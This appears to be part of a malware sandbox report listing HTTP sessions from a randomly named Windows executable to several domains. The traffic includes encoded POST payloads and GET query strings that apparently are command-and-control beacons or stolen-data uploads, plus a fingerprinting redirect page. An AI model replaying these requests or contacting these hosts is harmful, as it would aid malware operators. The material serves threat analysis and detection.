                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                  Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.549955103.224.182.24280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:04.921197891 CET495OUTGET /3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.madhf.tech
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:25:06.141623974 CET1236INHTTP/1.1 200 OK
                                                                                                                  date: Mon, 02 Dec 2024 14:25:05 GMT
                                                                                                                  server: Apache
                                                                                                                  set-cookie: __tad=1733149505.1376155; expires=Thu, 30-Nov-2034 14:25:05 GMT; Max-Age=315360000
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-length: 1490
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 62 56 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 62 30 76 6e 33 4c 4e 48 72 42 6e 57 61 4f 52 65 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 43 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 6c 5a 75 34 34 62 6f 58 41 77 4f 72 64 79 68 55 6c 43 2f 4f 4a 34 45 38 59 73 64 55 62 37 6f 47 47 43 6d 4e 52 68 78 78 67 35 79 46 68 41 3d 3d 26 77 7a 63 50 3d 69 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff"
                                                                                                                  Dec 2, 2024 15:25:06.141657114 CET526INData Raw: 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f
                                                                                                                  Data Ascii: text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd&fp=-3'>Click he


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.549972149.88.81.19080728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:12.496956110 CET753OUTPOST /hkgx/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.xcvbj.asia
                                                                                                                  Origin: http://www.xcvbj.asia
                                                                                                                  Referer: http://www.xcvbj.asia/hkgx/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2b 4e 2f 4c 69 7a 31 45 63 5a 4c 6a 38 69 4a 76 75 79 72 45 59 76 41 53 36 30 79 5a 6f 6c 76 53 67 75 6d 67 63 66 38 3d
                                                                                                                  Data Ascii: bV=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm+N/Liz1EcZLj8iJvuyrEYvAS60yZolvSgumgcf8=
                                                                                                                  Dec 2, 2024 15:25:14.074155092 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:13 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.549981149.88.81.19080728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:15.165941954 CET773OUTPOST /hkgx/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.xcvbj.asia
                                                                                                                  Origin: http://www.xcvbj.asia
                                                                                                                  Referer: http://www.xcvbj.asia/hkgx/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 73 71 71 6e 36 75 35 56 4f 37 36 4e 32 51 43 49 70 31 74 63 51 56 31 67 69 37 39 2f 71 6d 54 50 55 6b 47 6c 67 63
                                                                                                                  Data Ascii: bV=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPsqqn6u5VO76N2QCIp1tcQV1gi79/qmTPUkGlgc


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.549987149.88.81.19080728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:17.830518007 CET1790OUTPOST /hkgx/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.xcvbj.asia
                                                                                                                  Origin: http://www.xcvbj.asia
                                                                                                                  Referer: http://www.xcvbj.asia/hkgx/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 70 62 65 35 53 46 4e 75 55 72 58 59 4a 34 74 6b 78 53 77 68 56 47 68 34 2b 4b 43 47 4c 39 6c 74 76 6f 74 6a 48 71 59 32 4c 6d 75 51 75 4d 31 58 51 64 4b 5a 67 61 35 4a 78 78 71 63 32 59 77 65 34 62 77 50 68 61 57 55 78 76 6b 51 6e 63 54 4a 43 39 65 67 51 43 70 44 57 55 35 35 6e 44 6f 43 75 30 6c 38 49 4d 59 6b 65 30 30 68 37 45 4d 43 61 78 74 59 4e 6c 49 4e 36 69 50 77 33 4e 37 64 52 30 38 67 48 6b 61 6a 46 6d 6f 68 4f 62 6e 59 51 49 64 62 65 46 55 46 41 31 4d 6a 68 63 52 47 57 62 52 59 71 48 [TRUNCATED]
                                                                                                                  Data Ascii: bV=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRO8G4oiWHRtKJeV2UDDPwnLmc7YMK4IkjhEhBUDix9fiA8v187yctlLLj1crDWWnCVQF5mFGFT9X91dPUtD5FV9Qv5atHN7JIbNSHSSkilVV9TZc78LqoQ057PAnDAaCpbe5SFNuUrXYJ4tkxSwhVGh4+KCGL9ltvotjHqY2LmuQuM1XQdKZga5Jxxqc2Ywe4bwPhaWUxvkQncTJC9egQCpDWU55nDoCu0l8IMYke00h7EMCaxtYNlIN6iPw3N7dR08gHkajFmohObnYQIdbeFUFA1MjhcRGWbRYqHgxf1w/KM32LUupOLkK3OBqNqrFQqc3D9SCx6mpoxOT0ZfC6IAWhwU9Hrfbci5IS2CWVqkgZjGpxzCeTtRWgcnVoQR6cJBG8VV2TeRiHpPbOVXvCxGz87qveEpMNkiZeGRV+4dfdKa65p1yYmR1a31ledsmwC0FlfkwVG8K838aOfoBJkRcSew7s+GqKMR2ryabYiCgyWcc3R+w1Vm7pDUKa/QfQV+zhSQOZ4idpMS78eHyx366ZnEGm3bpEwNwpJiuCRMERmwqzsR+2qgJgKqY09U5NI2Xsml1cPVvM0sSjVcs6SyM/FGamZJDtKkO5UJFpF8dp64Y+Pwvbgt0gd5RUiZx67moiTi/TgBzUKaFSRG+NvPv6lWxspJVa9X2Vi4nzZ3OdeT8IM4h8nbKP0EHSOSPKQzkEDK35aI7hIDwqE8TwIXpSJye/fGxdkNcOL1qk0hdSvLpxj5TFtt/hidaJJROTKVaCJ2cfgcPczt7jw5ZiJUpucHtNZSiey+vluB/P1ZFeoXphe+GVDIW0szxMdaJGLpcx/z+3xu8q/jc0OE9jr1jUt894hFzRsYnZo/i+f4aY8+pCFXr1piJlHTKNNvJfQiivRlE5L+d8OA/oQbfsjM2TQnPniPQHBrJrFeOaWecGqmcebXUk7NMSsieJ0TQ1uD7Tii6 [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:25:19.424402952 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:19 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.549992149.88.81.19080728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:20.484267950 CET495OUTGET /hkgx/?wzcP=iLdd&bV=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvS5L8ubcdexDHAV6gjjxkBAdNrGiSX2pXpBWFAYYwVQiPg== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.xcvbj.asia
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:25:22.080389977 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:21 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.550001101.35.209.18380728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:28.108784914 CET762OUTPOST /31pt/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.yc791022.asia
                                                                                                                  Origin: http://www.yc791022.asia
                                                                                                                  Referer: http://www.yc791022.asia/31pt/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 72 4c 65 45 4e 51 4b 44 4c 54 47 53 71 45 46 42 2b 6e 49 71 4d 50 54 65 38 67 53 4d 68 5a 79 66 63 4b 43 52 57 39 49 3d
                                                                                                                  Data Ascii: bV=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefrLeENQKDLTGSqEFB+nIqMPTe8gSMhZyfcKCRW9I=
                                                                                                                  Dec 2, 2024 15:25:29.637854099 CET427INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:29 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 263
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
